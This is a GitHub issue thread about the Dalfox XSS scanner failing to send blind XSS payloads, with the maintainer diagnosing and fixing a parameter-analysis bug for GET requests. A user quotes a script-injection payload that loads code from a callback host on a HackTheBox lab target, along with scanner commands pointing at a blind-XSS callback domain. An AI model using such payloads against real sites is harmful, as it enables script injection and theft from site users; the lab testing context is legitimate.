search

hahwul / dalfox

🌙🦊 Dalfox is a powerful open-source XSS scanner and utility focused on automation.
https://dalfox.hahwul.com
MIT License
3.55k stars 397 forks source link

Dalfox Not Testing Blind XSS #409

Closed tekcap closed 1 year ago

tekcap commented 1 year ago

Running a very basic Blind XSS command against a hackthebox target and it doesn't look like Dalfox is even using the blind payload.

dalfox url "http://IP/hijacking/index.php?fullname=x&username=x&password=x&email=dsfs%40joe.com&imgurl=a" -b http://IP:8080 --skip-bav --debug --skip-mining-all -p imgurl -w 1

The imgurl parameter is vulnerable to this XSS payload: "><script src=http://IP:8080></script>

I'm assuming Dalfox will use that payload since it's a very basic one.

The debug shows this, but I'm not sure what it means:

 [88/143 Queries][61.54%] Testing "imgurl" param and waiting headlessSep 26 04:12:45.894 [DEBU] [toBlind] [vds] false
Sep 26 04:12:45.894 [DEBU] [toBlind] [vrs] false

Does the false mean that it's not attempting the blind payloads? All the other debug lines are showing me the payload that it is currently testing, but when the blind debug lines appears, it's empty, as shown above. I proxy everything through BURP and can confirm that it's not sending the blind payload.

hahwul commented 1 year ago

Hi @tekcap

What is the version of dalfox? First of all, the blind XSS payload is being sent well in my env. I need to know the exact situation, so please check it! (blind XSS is sent in various patterns in various sections such as parameters and headers.)

dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 -b hahwul.xss.ht --proxy http://localhost:8090

스크린샷 2022-09-27 오전 12 32 30

hahwul commented 1 year ago

Oh, there's one thing I found out. Based on the current pkg, parameters other than reflected are not testing blind xss. I think this was the problem, let me check quickly!

tekcap commented 1 year ago

I'm on version v2.8.1 installed with go command provided.

For some reason, the blind XSS doesn't even get sent in the url parameter. I don't see the payload anywhere in BURP

hahwul commented 1 year ago

@tekcap There was a bug in the parameter analysis and I just fixed it. Please update to v2.8.2 and check it! If it is reproduced in v2.8.2, please re-open it. Thank you very much :D

How to update DalFox

Test

Param Analysis (test with --report flag)

Old 스크린샷 2022-09-27 오전 12 54 41

New 스크린샷 2022-09-27 오전 12 55 03

Blind XSS Test

./dalfox version
# v2.8.2

./dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 \
      -b hahwul.xss.ht \
      --proxy http://localhost:8090

스크린샷 2022-09-27 오전 12 57 10

tekcap commented 1 year ago

I just realized this issue still persists when using "file --rawdata" with a post request.

I think you fixed it for GET, but not POST.

I see the Referrer header is working with the blind payload, but not the parameters

hahwul commented 1 year ago

@tekcap Thank you for the report! Let me check again :D

anasbousselham commented 11 months ago

Blind Payload Not Working in POST